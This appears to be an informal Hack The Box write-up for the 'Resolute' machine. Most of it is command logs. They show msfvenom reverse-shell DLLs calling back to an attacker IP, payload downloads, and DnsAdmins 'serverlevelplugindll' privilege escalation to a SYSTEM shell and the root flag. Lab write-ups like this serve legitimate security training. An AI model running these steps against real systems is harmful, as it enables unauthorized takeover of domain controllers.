msfvenom -p windows/x64/exec CMD="C:\path\to\nc.exe 10.10.14.20 444 -e cmd.exe" -f dll > malicious.dll
msfvenom -p windows/x64/exec CMD="C:\\path\\to\\nc.exe 10.10.14.20 444 -e cmd.exe" -f dll > malicious2.dll
copying and uploading nc.exe
┌──(kali㉿kali)-[~/HTB/resolute] └─$ locate nc.exe /usr/share/windows-resources/binaries/nc.exe ┌──(kali㉿kali)-[~/HTB/resolute] └─$ cp /usr/share/windows-resources/binaries/nc.exe ~/HTB/resolute ┌──(kali㉿kali)-[~/HTB/resolute] └─$
*Evil-WinRM* PS C:\Users\ryan\Documents> upload /home/kali/HTB/resolute/nc.exe Info: Uploading /home/kali/HTB/resolute/nc.exe to C:\Users\ryan\Documents\nc.exe Data: 79188 bytes of 79188 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\Users\ryan\Documents>
msfvenom
┌──(kali㉿kali)-[~/HTB/resolute] └─$ msfvenom -p windows/x64/exec CMD="C:\\Users\\ryan\\Documents\\nc.exe 10.10.14.20 444 -e cmd.exe" -f dll > malicious2.dll [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 325 bytes Final size of dll file: 9216 bytes ┌──(kali㉿kali)-[~/HTB/resolute] └─$
load the dll using the dns service
dnscmd.exe /config /serverlevelplugindll C:\Users\ryan\Documents\malicious2.dll
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe /config /serverlevelplugindll C:\Users\ryan\Documents\malicious2.dll Registry property serverlevelplugindll successfully reset. Command completed successfully. *Evil-WinRM* PS C:\Users\ryan\Documents>
Ran and this filed. realised all dll and exe are 0 bytes buth other files upload ok
*Evil-WinRM* PS C:\Users\ryan\Documents> ls Directory: C:\Users\ryan\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/16/2023 9:48 AM 0 malicious.dll -a---- 9/16/2023 10:46 AM 0 malicious2.dll -a---- 9/16/2023 10:42 AM 59392 nc.exe -a---- 9/16/2023 10:05 AM 0 pwned.dll -a---- 9/16/2023 10:56 AM 959 resolute.gnmap -a---- 9/16/2023 10:12 AM 0 shell.exe -a---- 9/16/2023 10:14 AM 53624 shell2.exe -a---- 9/16/2023 10:19 AM 0 shell_x64.dll
will rename the dll to txt then upload the rename - malicious2.txt but still showing zeo
*Evil-WinRM* PS C:\Users\ryan\Documents> ls Directory: C:\Users\ryan\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/16/2023 9:48 AM 0 malicious.dll -a---- 9/16/2023 10:46 AM 0 malicious2.dll -a---- 9/16/2023 10:59 AM 0 malicious2.txt -a---- 9/16/2023 10:42 AM 59392 nc.exe -a---- 9/16/2023 10:05 AM 0 pwned.dll -a---- 9/16/2023 10:56 AM 959 resolute.gnmap -a---- 9/16/2023 10:12 AM 0 shell.exe -a---- 9/16/2023 10:14 AM 53624 shell2.exe -a---- 9/16/2023 10:19 AM 0 shell_x64.dll
we try a different method to upload the file i.e powershell -- invoke-WebRequest -Uri http://10.10.14.20:8000/malicious6.dll -OutFile malicious6.dll -UseBasicParsing
kali
kali㉿kali)-[~/HTB/resolute] └─$ python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.10.10.169 - - [16/Sep/2023 14:06:14] "GET /malicious6.dll HTTP/1.1" 200 -
host machine
*Evil-WinRM* PS C:\Users\ryan\Documents> invoke-WebRequest -Uri http://10.10.14.20:8000/malicious6.dll -OutFile malicious6.dll -UseBasicParsing *Evil-WinRM* PS C:\Users\ryan\Documents> ls Directory: C:\Users\ryan\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/16/2023 11:02 AM 0 again.txt -a---- 9/16/2023 9:48 AM 0 malicious.dll -a---- 9/16/2023 10:46 AM 0 malicious2.dll -a---- 9/16/2023 10:59 AM 0 malicious2.txt -a---- 9/16/2023 11:15 AM 9216 malicious6.dll -a---- 9/16/2023 10:42 AM 59392 nc.exe -a---- 9/16/2023 10:05 AM 0 pwned.dll -a---- 9/16/2023 10:56 AM 959 resolute.gnmap -a---- 9/16/2023 10:12 AM 0 shell.exe -a---- 9/16/2023 10:14 AM 53624 shell2.exe -a---- 9/16/2023 10:19 AM 0 shell_x64.dll -a---- 9/16/2023 11:00 AM 0 tt.txt
load into dns -- dnscmd . /config /serverlevelplugindll C:\Users\ryan\Documents\malicious6.dll
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd . /config /serverlevelplugindll C:\Users\ryan\Documents\malicious6.dll Registry property serverlevelplugindll successfully reset. Command completed successfully. *Evil-WinRM* PS C:\Users\ryan\Documents>
reverse shell fails again.will try with x64 version of ncat 64 bit i found here - https://github.com/int0x33/nc.exe/
*Evil-WinRM* PS C:\Users\ryan\Documents> invoke-WebRequest -Uri http://10.10.14.20:8000/nc64.exe -OutFile nc64.exe -UseBasicParsing *Evil-WinRM* PS C:\Users\ryan\Documents> invoke-WebRequest -Uri http://10.10.14.20:8000/dnshack.dll -OutFile dnshack.dll -UseBasicParsing *Evil-WinRM* PS C:\Users\ryan\Documents> ls Directory: C:\Users\ryan\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/16/2023 11:02 AM 0 again.txt -a---- 9/16/2023 11:26 AM 9216 dnshack.dll -a---- 9/16/2023 9:48 AM 0 malicious.dll -a---- 9/16/2023 10:46 AM 0 malicious2.dll -a---- 9/16/2023 10:59 AM 0 malicious2.txt -a---- 9/16/2023 10:42 AM 59392 nc.exe -a---- 9/16/2023 11:25 AM 45272 nc64.exe -a---- 9/16/2023 10:05 AM 0 pwned.dll -a---- 9/16/2023 10:56 AM 959 resolute.gnmap -a---- 9/16/2023 10:12 AM 0 shell.exe -a---- 9/16/2023 10:14 AM 53624 shell2.exe -a---- 9/16/2023 10:19 AM 0 shell_x64.dll -a---- 9/16/2023 11:00 AM 0 tt.txt *Evil-WinRM* PS C:\Users\ryan\Documents>
kali msfvenom
└─$ msfvenom -p windows/x64/exec CMD="C:\\Users\\ryan\\Documents\\nc64.exe 10.10.14.20 444 -e cmd.exe" -f dll > dnshack.dll [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 327 bytes Final size of dll file: 9216 bytes
load and try again but fails
We will try meterpreter payload
m -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=444 -f dll > final.dll [sudo] password for kali: [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload No encoder specified, outputting raw payload Payload size: 510 bytes Final size of dll file: 9216 bytes ┌──(kali㉿kali)-[~/HTB/resolute]
upload and load and verify
*Evil-WinRM* PS C:\Users\ryan\Documents> invoke-WebRequest -Uri http://10.10.14.20:8000/final.dll -OutFile final.dll -UseBasicParsing *Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe 10.10.10.169 /config /serverlevelplugindll C:\Users\ryan\Documents\final.dll Registry property serverlevelplugindll successfully reset. Command completed successfully. *Evil-WinRM* PS C:\Users\ryan\Documents> Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll ServerLevelPluginDll : C:\Users\ryan\Documents\final.dll PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS PSChildName : Parameters PSDrive : HKLM PSProvider : Microsoft.PowerShell.Core\Registry *Evil-WinRM* PS C:\Users\ryan\Documents>
stop and start dns while trying to catch on kali
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 3 STOP_PENDING (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x1 WAIT_HINT : 0x7530 *Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe query dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 1 STOPPED WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 *Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x7d0 PID : 3504 FLAGS : *Evil-WinRM* PS C:\Users\ryan\Documents>
wil try multi handler instead of nc
Kept failing.
restartd the machine and trying again
msfvenom
└─$ sudo msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=4444 -f dll > reboot.dll [sudo] password for kali: [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload No encoder specified, outputting raw payload Payload size: 510 bytes Final size of dll file: 9216 bytes
download the dll to the pc
*Evil-WinRM* PS C:\Users\ryan\Documents> Invoke-WebRequest -Uri http://10.10.14.20:8000/resolute.dll -OutFile resolute.dll -UseBasicParsing *Evil-WinRM* PS C:\Users\ryan\Documents> ls Directory: C:\Users\ryan\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/17/2023 3:17 AM 9216 reboot.dll *Evil-WinRM* PS C:\Users\ryan\Documents>
after a lot of murking around i gave up on the evil-wrm method of loading
from the evil-winrm prompt
new dll
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.20 LPORT=4444 --platform=windows -f dll > resolute.dll [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of dll file: 9216 bytes ┌──(kali㉿kali)-[~/HTB/resolute]
will serve using smbserver.py
└─$ python3 ./smbserver.py share /home/kali/HTB/resolute/ Impacket v0.11.0 - Copyright 2023 Fortra [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed [*] Incoming connection (10.10.10.169,52573) [*] AUTHENTICATE_MESSAGE (\,RESOLUTE)
load to dns -- dnscmd resolute.megabank.local /config /serverlevelplugindll \10.10.14.20\share\resolute.dll
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd resolute.megabank.local /config /serverlevelplugindll \\10.10.14.20\share\resolute.dll Registry property serverlevelplugindll successfully reset. Command completed successfully. *Evil-WinRM* PS C:\Users\ryan\Documents> sc.stop dns The term 'sc.stop' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:1 + sc.stop dns + ~~~~~~~ + CategoryInfo : ObjectNotFound: (sc.stop:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException *Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 3 STOP_PENDING (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 *Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x7d0 PID : 804 FLAGS : *Evil-WinRM* PS C:\Users\ryan\Documents>
metasploit listener
msf6 > use exploit/windows/x64/shell_reverse_tcp [-] No results from search [-] Failed to load module: exploit/windows/x64/shell_reverse_tcp msf6 > use multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > use exploit/windows/x64/shell_reverse_tcp [-] No results from search [-] Failed to load module: exploit/windows/x64/shell_reverse_tcp msf6 exploit(multi/handler) > set payload exploit/windows/x64/shell_reverse_tcp [-] The value specified for payload is not valid. msf6 exploit(multi/handler) > set PAYLOAD windows/x64/shell_reverse_tcp PAYLOAD => windows/x64/shell_reverse_tcp msf6 exploit(multi/handler) > set LHOST 10.10.14.20LHOST => 10.10.14.20 msf6 exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf6 exploit(multi/handler) > Interrupt: use the 'exit' command to quit msf6 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/x64/shell_reverse_tcp): Name Current Se Required Description tting ---- ---------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '' , seh, thread, process, none ) LHOST 10.10.14.2 yes The listen add 0 ress (an inter face may be sp ecified) LPORT 4444 yes The listen por t Exploit target: Id Name -- ---- 0 Wildcard Target View the full module info with the info, or info -d command. msf6 exploit(multi/handler) > exploit
we get in!!
[*] Started reverse TCP handler on 10.10.14.20:4444 [*] Command shell session 1 opened (10.10.14.20:4444 -> 10.10.10.169:49850) at 2023-09-17 08:10:58 -0400 Shell Banner: Microsoft Windows [Version 10.0.14393] ----- C:\Windows\system32>ls
C:\Users\Administrator\Desktop>cat root.txt cat root.txt 'cat' is not recognized as an internal or external command, operable program or batch file. C:\Users\Administrator\Desktop>type root.txt type root.txt b0bd7a3c695fe7b68d3489ffd5f77848 C:\Users\Administrator\Desktop>